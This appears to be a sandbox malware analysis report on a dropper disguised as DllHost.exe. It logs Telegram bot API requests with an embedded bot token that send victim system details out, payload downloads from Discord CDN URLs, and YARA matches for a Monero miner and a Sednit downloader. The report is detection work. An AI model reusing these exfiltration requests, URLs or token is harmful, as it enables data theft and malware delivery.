Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191BDD20 InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7191BDD20
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 YaBrowser/22.1.2.834 Yowser/2.5 Safari/537.36Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET /bot5468819057:AAHRJabfvGnrMiNkuZj9RaE8-OjfRBxOw-4/sendMessage?chat_id=1327052997&text=New%20User:%20618321%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0AIP:%20102.129.143.92 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 YaBrowser/22.1.2.834 Yowser/2.5 Safari/537.36Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /attachments/993716767685873716/993957505698910218/UpSys.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn.discordapp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /attachments/993716767685873716/993957763715698769/CPU.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn.discordapp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 YaBrowser/22.1.2.834 Yowser/2.5 Safari/537.36Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET /bot5468819057:AAHRJabfvGnrMiNkuZj9RaE8-OjfRBxOw-4/sendMessage?chat_id=1327052997&text=New%20User:%20618321%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0AIP:%20102.129.143.92 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 YaBrowser/22.1.2.834 Yowser/2.5 Safari/537.36Host: api.telegram.org
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownHTTPS traffic detected: 52.20.78.240:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.220.57.224:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140051190 GetParent,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,PostMessageW,PostMessageW,44_2_0000000140051190
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014006A830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,44_2_000000014006A830
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014007FCA0 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,44_2_000000014007FCA0

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 4.0.procexp.exe.7ff64b1d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 4.0.procexp.exe.7ff64b1d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
Source: C:\ProgramData\Systemd\procexp.exe, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\ProgramData\Systemd\procexp.exe, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 472 -p 6616 -ip 6616
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191B59300_2_00007FF7191B5930
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191CD96D0_2_00007FF7191CD96D
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191C7C200_2_00007FF7191C7C20
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191C6B300_2_00007FF7191C6B30
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191C72900_2_00007FF7191C7290
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191ED4440_2_00007FF7191ED444
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191B66200_2_00007FF7191B6620
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191C57500_2_00007FF7191C5750
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191DDA700_2_00007FF7191DDA70
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191CDB040_2_00007FF7191CDB04
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191F39800_2_00007FF7191F3980
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191EDA080_2_00007FF7191EDA08
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191F09E40_2_00007FF7191F09E4
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191CAC700_2_00007FF7191CAC70
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191DEC6C0_2_00007FF7191DEC6C
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191EDC140_2_00007FF7191EDC14
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191E5EF40_2_00007FF7191E5EF4
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191C9D430_2_00007FF7191C9D43
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191C9D3B0_2_00007FF7191C9D3B
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191C9D4B0_2_00007FF7191C9D4B
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191C9D5C0_2_00007FF7191C9D5C
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191CE02C0_2_00007FF7191CE02C
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191E902C0_2_00007FF7191E902C
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191EA0800_2_00007FF7191EA080
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191D00C00_2_00007FF7191D00C0
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191F22C80_2_00007FF7191F22C8
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191DE2040_2_00007FF7191DE204
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191DB4880_2_00007FF7191DB488
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191CD4700_2_00007FF7191CD470
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191CF4C00_2_00007FF7191CF4C0
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191E24EC0_2_00007FF7191E24EC
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191CE3380_2_00007FF7191CE338
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191E33180_2_00007FF7191E3318
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191C36A00_2_00007FF7191C36A0
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191EF5C40_2_00007FF7191EF5C4
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191EB7880_2_00007FF7191EB788
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191DE7600_2_00007FF7191DE760
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFF7F160CB82_2_00007FFF7F160CB8
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C4662011_2_00007FF6E4C46620
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C4593011_2_00007FF6E4C45930
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C5729011_2_00007FF6E4C57290
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C7F5C411_2_00007FF6E4C7F5C4
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C536A011_2_00007FF6E4C536A0
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C7B78811_2_00007FF6E4C7B788
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C5575011_2_00007FF6E4C55750
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C6E76011_2_00007FF6E4C6E760
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C6E20411_2_00007FF6E4C6E204
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C7331811_2_00007FF6E4C73318
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C822C811_2_00007FF6E4C822C8
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C5E33811_2_00007FF6E4C5E338
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C5F4C011_2_00007FF6E4C5F4C0
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C724EC11_2_00007FF6E4C724EC
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C6B48811_2_00007FF6E4C6B488
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C7D44411_2_00007FF6E4C7D444
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C5D47011_2_00007FF6E4C5D470
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C59D4B11_2_00007FF6E4C59D4B
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C59D3B11_2_00007FF6E4C59D3B
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C59D4311_2_00007FF6E4C59D43
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C59D5C11_2_00007FF6E4C59D5C
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C75EF411_2_00007FF6E4C75EF4
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C7902C11_2_00007FF6E4C7902C
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C5E02C11_2_00007FF6E4C5E02C
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C600C011_2_00007FF6E4C600C0
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C7A08011_2_00007FF6E4C7A080
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C7DA0811_2_00007FF6E4C7DA08
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C809E411_2_00007FF6E4C809E4
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C8398011_2_00007FF6E4C83980
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C5D96D11_2_00007FF6E4C5D96D
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C5DB0411_2_00007FF6E4C5DB04
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C56B3011_2_00007FF6E4C56B30
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C6DA7011_2_00007FF6E4C6DA70
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C7DC1411_2_00007FF6E4C7DC14
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C57C2011_2_00007FF6E4C57C20
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C6EC6C11_2_00007FF6E4C6EC6C
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: 11_2_00007FF6E4C5AC7011_2_00007FF6E4C5AC70
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014001005044_2_0000000140010050
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014000608044_2_0000000140006080
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014002527C44_2_000000014002527C
Source: C:\ProgramData\UpSys.exeCode function: 44_2_00000001400072E044_2_00000001400072E0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014002241C44_2_000000014002241C
Source: C:\ProgramData\UpSys.exeCode function: 44_2_00000001400194C044_2_00000001400194C0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014002D59C44_2_000000014002D59C
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014001970C44_2_000000014001970C
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014007E83044_2_000000014007E830
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140095D9044_2_0000000140095D90
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014002CD9C44_2_000000014002CD9C
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140086EF044_2_0000000140086EF0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140091FF044_2_0000000140091FF0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014006601044_2_0000000140066010
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014009506044_2_0000000140095060
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014000506044_2_0000000140005060
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014005607044_2_0000000140056070
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014006909044_2_0000000140069090
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014005B0C044_2_000000014005B0C0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_00000001400840F044_2_00000001400840F0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014002810844_2_0000000140028108
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014002019844_2_0000000140020198
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014008A1A044_2_000000014008A1A0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014000506044_2_0000000140005060
Source: C:\ProgramData\UpSys.exeCode function: 44_2_00000001400271EC44_2_00000001400271EC
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014007E24044_2_000000014007E240
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014007625044_2_0000000140076250
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014001B29044_2_000000014001B290
Source: C:\ProgramData\UpSys.exeCode function: 44_2_00000001400212C044_2_00000001400212C0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014007131044_2_0000000140071310
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014006531044_2_0000000140065310
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014006933044_2_0000000140069330
Source: C:\ProgramData\UpSys.exeCode function: 44_2_00000001400703F044_2_00000001400703F0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014009144044_2_0000000140091440
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014000146044_2_0000000140001460
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014002F52044_2_000000014002F520
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014002C56844_2_000000014002C568
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014008F5C044_2_000000014008F5C0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014005360044_2_0000000140053600
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014001C64044_2_000000014001C640
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014007367044_2_0000000140073670
Source: C:\ProgramData\UpSys.exeCode function: 44_2_00000001400256C844_2_00000001400256C8
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014001B6F044_2_000000014001B6F0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014008870044_2_0000000140088700
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014004F73044_2_000000014004F730
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014008E76044_2_000000014008E760
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014006476044_2_0000000140064760
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014002678444_2_0000000140026784
Source: C:\ProgramData\UpSys.exeCode function: 44_2_00000001400837B044_2_00000001400837B0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014007680044_2_0000000140076800
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014002782444_2_0000000140027824
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014002C89C44_2_000000014002C89C
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014002889C44_2_000000014002889C
Source: C:\ProgramData\UpSys.exeCode function: 44_2_00000001400558A044_2_00000001400558A0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_00000001400148A044_2_00000001400148A0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_00000001400698E044_2_00000001400698E0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014002B92C44_2_000000014002B92C
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014001C97044_2_000000014001C970
Source: C:\ProgramData\UpSys.exeCode function: 44_2_00000001400189B844_2_00000001400189B8
Source: C:\ProgramData\UpSys.exeCode function: 44_2_00000001400709D044_2_00000001400709D0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014001BA0C44_2_000000014001BA0C
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140023A6C44_2_0000000140023A6C
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140027AAC44_2_0000000140027AAC
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014008FAD044_2_000000014008FAD0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014007ABA044_2_000000014007ABA0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140025BCC44_2_0000000140025BCC
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140041BD044_2_0000000140041BD0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140079BF044_2_0000000140079BF0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140026C2444_2_0000000140026C24
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014002EC2444_2_000000014002EC24
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014002BC9044_2_000000014002BC90
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140002C9044_2_0000000140002C90
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140089CB044_2_0000000140089CB0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014001CCB044_2_000000014001CCB0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140087CD044_2_0000000140087CD0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014001ED4044_2_000000014001ED40
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140018D8844_2_0000000140018D88
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140022DCC44_2_0000000140022DCC
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014007DE7044_2_000000014007DE70
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014000608044_2_0000000140006080
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014008EF5044_2_000000014008EF50
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140044080 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock,44_2_0000000140044080
Source: UpSys[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UpSys[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UpSys[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UpSys[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UpSys[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UpSys[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UpSys[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UpSys[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UpSys[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UpSys.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UpSys.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UpSys.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UpSys.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UpSys.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UpSys.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UpSys.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UpSys.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UpSys.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
Source: procexp.exe.0.drStatic PE information: Number of sections : 11 > 10
Source: DllHost.exe, type: SAMPLEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 11.2.System.exe.7ff6e4c40000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 11.0.System.exe.7ff6e4c40000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 0.0.DllHost.exe.7ff7191b0000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 0.2.DllHost.exe.7ff7191b0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 11.0.System.exe.7ff6e4c40000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 11.0.System.exe.7ff6e4c40000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 0.0.DllHost.exe.7ff7191b0000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 0.0.DllHost.exe.7ff7191b0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 4.0.procexp.exe.7ff64b1d0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 4.0.procexp.exe.7ff64b1d0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 0000002C.00000003.367524176.0000000003151000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
Source: 00000045.00000003.430480390.00000000030E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
